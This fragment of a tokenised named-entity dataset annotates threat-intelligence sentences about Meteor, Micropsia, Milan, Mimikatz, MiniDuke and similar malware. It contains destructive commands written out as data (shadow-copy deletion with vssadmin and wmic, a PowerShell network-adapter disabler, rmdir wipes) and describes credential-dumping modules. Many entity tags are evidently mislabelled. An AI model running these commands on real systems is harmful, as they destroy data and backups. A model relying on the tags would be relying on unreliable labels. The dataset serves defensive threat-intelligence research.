- "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "will", - "delete", - "the", - "folder", - "containing", - "malicious", - "scripts", - "if", - "it", - "detects", - "the", - "hostname", - "as", - "`PIS-APP`,", - "`PIS-MOB`,", - "`WSUSPROXY`,", - "or", - "`PIS-DB`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "use", - "group", - "policy", - "to", - "push", - "a", - "scheduled", - "task", - "from", - "the", - "AD", - "to", - "all", - "network", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "hide", - "its", - "console", - "window", - "upon", - "execution", - "to", - "decrease", - "its", - "visibility", - "to", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "has", - "the", - "ability", - "to", - "download", - "additional", - "files", - "for", - "execution", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "use", - "`bcdedit`", - "to", - "delete", - "different", - "boot", - "identifiers", - "on", - "a", - "compromised", - "host;", - "it", - "can", - "also", - "use", - "`vssadmin.exe", - "delete", - "shadows", - "/all", - "/quiet`", - "and", - "`C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe", - "shadowcopy", - "delete`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "change", - "both", - "the", - "desktop", - "wallpaper", - "and", - "the", - "lock", - "screen", - "image", - "to", - "a", - "custom", - "image." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "has", - "been", - "disguised", - "as", - "the", - "Windows", - "Power", - "Efficiency", - "Diagnostics", - "report", - "tool." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "use", - "`WinAPI`", - "to", - "remove", - "a", - "victim", - "machine", - "from", - "an", - "Active", - "Directory", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "use", - "PowerShell", - "commands", - "to", - "disable", - "the", - "network", - "adapters", - "on", - "a", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "check", - "if", - "a", - "specific", - "process", - "is", - "running,", - "such", - "as", - "Kaspersky's", - "`avp.exe`." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SamFile" - ] - }, - { - "tokens": [ - "Meteor", - "execution", - "begins", - "from", - "a", - "scheduled", - "task", - "named", - "`Microsoft\\Windows\\Power", - "Efficiency", - "Diagnostics\\AnalyzeAll`", - "and", - "it", - "creates", - "a", - "separate", - "scheduled", - "task", - "called", - "`mstask`", - "to", - "run", - "the", - "wiper", - "only", - "once", - "at", - "23:55:00." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "has", - "the", - "ability", - "to", - "search", - "for", - "Kaspersky", - "Antivirus", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "disconnect", - "all", - "network", - "adapters", - "on", - "a", - "compromised", - "host", - "using", - "`powershell", - "-Command", - "\"Get-WmiObject", - "-class", - "Win32_NetworkAdapter", - "|", - "ForEach", - "{", - "If", - "($.NetEnabled)", - "{", - "$.Disable()", - "}", - "}\"", - ">", - "NUL`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "has", - "the", - "ability", - "to", - "discover", - "the", - "hostname", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "run", - "`set.bat`,", - "`update.bat`,", - "`cache.bat`,", - "`bcd.bat`,", - "`msrun.bat`,", - "and", - "similar", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Meteor", - "can", - "use", - "`wmic.exe`", - "as", - "part", - "of", - "its", - "effort", - "to", - "delete", - "shadow", - "copies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "creates", - "a", - "RAR", - "archive", - "based", - "on", - "collected", - "files", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "can", - "perform", - "microphone", - "recording." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "executes", - "an", - "RAR", - "tool", - "to", - "recursively", - "archive", - "files", - "based", - "on", - "a", - "predefined", - "list", - "of", - "file", - "extensions", - "(*.xls,", - "*.xlsx,", - "*.csv,", - "*.odt,", - "*.doc,", - "*.docx,", - "*.ppt,", - "*.pptx,", - "*.pdf,", - "*.mdb,", - "*.accdb,", - "*.accde,", - "*.txt)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Micropsia", - "obfuscates", - "the", - "configuration", - "with", - "a", - "custom", - "Base64", - "and", - "XOR." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "can", - "perform", - "a", - "recursive", - "directory", - "listing", - "for", - "all", - "volume", - "drives", - "available", - "on", - "the", - "victim's", - "machine", - "and", - "can", - "also", - "fetch", - "specific", - "files", - "by", - "their", - "paths." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "creates", - "a", - "new", - "hidden", - "directory", - "to", - "store", - "all", - "components'", - "outputs", - "in", - "a", - "dedicated", - "sub-folder", - "for", - "each." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "can", - "download", - "and", - "execute", - "an", - "executable", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "has", - "keylogging", - "capabilities." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "takes", - "screenshots", - "every", - "90", - "seconds", - "by", - "calling", - "the", - "Gdi32.BitBlt", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "searches", - "for", - "anti-virus", - "software", - "and", - "firewall", - "products", - "installed", - "on", - "the", - "victim’s", - "machine", - "using", - "WMI." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Micropsia", - "creates", - "a", - "shortcut", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "gathers", - "the", - "hostname", - "and", - "OS", - "version", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "collects", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "network", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Micropsia", - "creates", - "a", - "command-line", - "shell", - "using", - "cmd.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Micropsia", - "searches", - "for", - "anti-virus", - "software", - "and", - "firewall", - "products", - "installed", - "on", - "the", - "victim’s", - "machine", - "using", - "WMI." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Milan", - "can", - "use", - "a", - "COM", - "component", - "to", - "generate", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "has", - "the", - "ability", - "to", - "use", - "DNS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "upload", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "use", - "hardcoded", - "domains", - "as", - "an", - "input", - "for", - "domain", - "generation", - "algorithms." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "has", - "used", - "an", - "executable", - "named", - "`companycatalog.exe.config`", - "to", - "appear", - "benign." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "encode", - "files", - "containing", - "information", - "about", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "delete", - "files", - "via", - "`C:\\Windows\\system32\\cmd.exe", - "/c", - "ping", - "1.1.1.1", - "-n", - "1", - "-w", - "3000", - ">", - "Nul", - "&", - "rmdir", - "/s", - "/q`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Milan", - "has", - "received", - "files", - "from", - "C2", - "and", - "stored", - "them", - "in", - "log", - "folders", - "beginning", - "with", - "the", - "character", - "sequence", - "`a9850d2f`." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "has", - "run", - "`C:\\Windows\\system32\\cmd.exe", - "/c", - "cmd", - "/c", - "dir", - "c:\\users\\", - "/s", - "2>&1`", - "to", - "discover", - "local", - "accounts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "has", - "saved", - "files", - "prior", - "to", - "upload", - "from", - "a", - "compromised", - "host", - "to", - "folders", - "beginning", - "with", - "the", - "characters", - "`a9850d2f`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "has", - "used", - "an", - "executable", - "named", - "`companycatalogue`", - "to", - "appear", - "benign." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "use", - "the", - "API", - "`DnsQuery_A`", - "for", - "DNS", - "resolution." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "use", - "a", - "custom", - "protocol", - "tunneled", - "through", - "DNS", - "or", - "HTTP." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Milan", - "can", - "query", - "`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", - "MachineGuid`", - "to", - "retrieve", - "the", - "machine", - "GUID." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "establish", - "persistence", - "on", - "a", - "targeted", - "host", - "with", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "enumerate", - "the", - "targeted", - "machine's", - "name", - "and", - "GUID." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "run", - "`C:\\Windows\\system32\\cmd.exe", - "/c", - "cmd", - "/c", - "ipconfig", - "/all", - "2>&1`", - "to", - "discover", - "network", - "settings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "identify", - "users", - "registered", - "to", - "a", - "targeted", - "machine." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "use", - "HTTPS", - "for", - "communication", - "with", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Milan", - "can", - "use", - "`cmd.exe`", - "for", - "discovery", - "actions", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MimiPenguin", - "can", - "use", - "the", - "`<PID>/maps`", - "and", - "`<PID>/mem`", - "file", - "to", - "search", - "for", - "regex", - "patterns", - "and", - "dump", - "the", - "process", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Mimikatz", - "credential", - "dumper", - "has", - "been", - "extended", - "to", - "include", - "Skeleton", - "Key", - "domain", - "controller", - "authentication", - "bypass", - "functionality.", - "The", - "<code>LSADUMP::ChangeNTLM</code>", - "and", - "<code>LSADUMP::SetNTLM</code>", - "modules", - "can", - "also", - "manipulate", - "the", - "password", - "hash", - "of", - "an", - "account", - "without", - "knowing", - "the", - "clear", - "text", - "value." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "performs", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information", - "useful", - "in", - "gaining", - "access", - "to", - "additional", - "systems", - "and", - "enterprise", - "network", - "resources.", - "It", - "contains", - "functionality", - "to", - "acquire", - "information", - "about", - "credentials", - "in", - "many", - "ways,", - "including", - "from", - "the", - "credential", - "vault", - "and", - "DPAPI." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mimikatz", - "performs", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information", - "useful", - "in", - "gaining", - "access", - "to", - "additional", - "systems", - "and", - "enterprise", - "network", - "resources.", - "It", - "contains", - "functionality", - "to", - "acquire", - "information", - "about", - "credentials", - "in", - "many", - "ways,", - "including", - "from", - "DPAPI." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mimikatz", - "performs", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information", - "useful", - "in", - "gaining", - "access", - "to", - "additional", - "systems", - "and", - "enterprise", - "network", - "resources.", - "It", - "contains", - "functionality", - "to", - "acquire", - "information", - "about", - "credentials", - "in", - "many", - "ways,", - "including", - "from", - "DCSync/NetSync." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Mimikatz's", - "kerberos", - "module", - "can", - "create", - "golden", - "tickets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "performs", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information", - "useful", - "in", - "gaining", - "access", - "to", - "additional", - "systems", - "and", - "enterprise", - "network", - "resources.", - "It", - "contains", - "functionality", - "to", - "acquire", - "information", - "about", - "credentials", - "in", - "many", - "ways,", - "including", - "from", - "the", - "LSA." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "performs", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information", - "useful", - "in", - "gaining", - "access", - "to", - "additional", - "systems", - "and", - "enterprise", - "network", - "resources.", - "It", - "contains", - "functionality", - "to", - "acquire", - "information", - "about", - "credentials", - "in", - "many", - "ways,", - "including", - "from", - "the", - "LSASS", - "Memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz's", - "<code>SEKURLSA::Pth</code>", - "module", - "can", - "impersonate", - "a", - "user,", - "with", - "only", - "a", - "password", - "hash,", - "to", - "execute", - "arbitrary", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz’s", - "<code>LSADUMP::DCSync</code>", - "and", - "<code>KERBEROS::PTT</code>", - "modules", - "implement", - "the", - "three", - "steps", - "required", - "to", - "extract", - "the", - "krbtgt", - "account", - "hash", - "and", - "create/use", - "Kerberos", - "tickets." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz's", - "<code>CRYPTO::Extract</code>", - "module", - "can", - "extract", - "keys", - "by", - "interacting", - "with", - "Windows", - "cryptographic", - "application", - "programming", - "interface", - "(API)", - "functions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz’s", - "<code>LSADUMP::DCShadow</code>", - "module", - "can", - "be", - "used", - "to", - "make", - "AD", - "updates", - "by", - "temporarily", - "setting", - "a", - "computer", - "to", - "be", - "a", - "DC." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz's", - "<code>MISC::AddSid</code>", - "module", - "can", - "append", - "any", - "SID", - "or", - "user/group", - "account", - "to", - "a", - "user's", - "SID-History.", - "Mimikatz", - "also", - "utilizes", - "SID-History", - "Injection", - "to", - "expand", - "the", - "scope", - "of", - "other", - "components", - "such", - "as", - "generated", - "Kerberos", - "Golden", - "Tickets", - "and", - "DCSync", - "beyond", - "a", - "single", - "domain." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "B-SecTeam", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "performs", - "credential", - "dumping", - "to", - "obtain", - "account", - "and", - "password", - "information", - "useful", - "in", - "gaining", - "access", - "to", - "additional", - "systems", - "and", - "enterprise", - "network", - "resources.", - "It", - "contains", - "functionality", - "to", - "acquire", - "information", - "about", - "credentials", - "in", - "many", - "ways,", - "including", - "from", - "the", - "SAM", - "table." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Mimikatz", - "credential", - "dumper", - "contains", - "an", - "implementation", - "of", - "an", - "SSP." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mimikatz's", - "kerberos", - "module", - "can", - "create", - "silver", - "tickets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Mimikatz's", - "`CRYPTO`", - "module", - "can", - "create", - "and", - "export", - "various", - "types", - "of", - "authentication", - "certificates." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Mimikatz", - "contains", - "functionality", - "to", - "acquire", - "credentials", - "from", - "the", - "Windows", - "Credential", - "Manager." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Miner-C", - "copies", - "itself", - "into", - "the", - "public", - "folder", - "of", - "Network", - "Attached", - "Storage", - "(NAS)", - "devices", - "and", - "infects", - "new", - "victims", - "who", - "open", - "the", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "MiniDuke", - "components", - "use", - "Twitter", - "to", - "initially", - "obtain", - "the", - "address", - "of", - "a", - "C2", - "server", - "or", - "as", - "a", - "backup", - "if", - "no", - "hard-coded", - "C2", - "server", - "responds." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Org", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "can", - "use", - "DGA", - "to", - "generate", - "new", - "Twitter", - "URLs", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "uses", - "Google", - "Search", - "to", - "identify", - "C2", - "servers", - "if", - "its", - "primary", - "C2", - "method", - "via", - "Twitter", - "is", - "not", - "working." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "can", - "enumerate", - "local", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "can", - "download", - "additional", - "encrypted", - "backdoors", - "onto", - "the", - "victim", - "via", - "GIF", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "can", - "can", - "use", - "a", - "named", - "pipe", - "to", - "forward", - "communications", - "from", - "one", - "compromised", - "machine", - "with", - "internet", - "access", - "to", - "other", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "can", - "use", - "control", - "flow", - "flattening", - "to", - "obscure", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "can", - "gather", - "the", - "hostname", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - 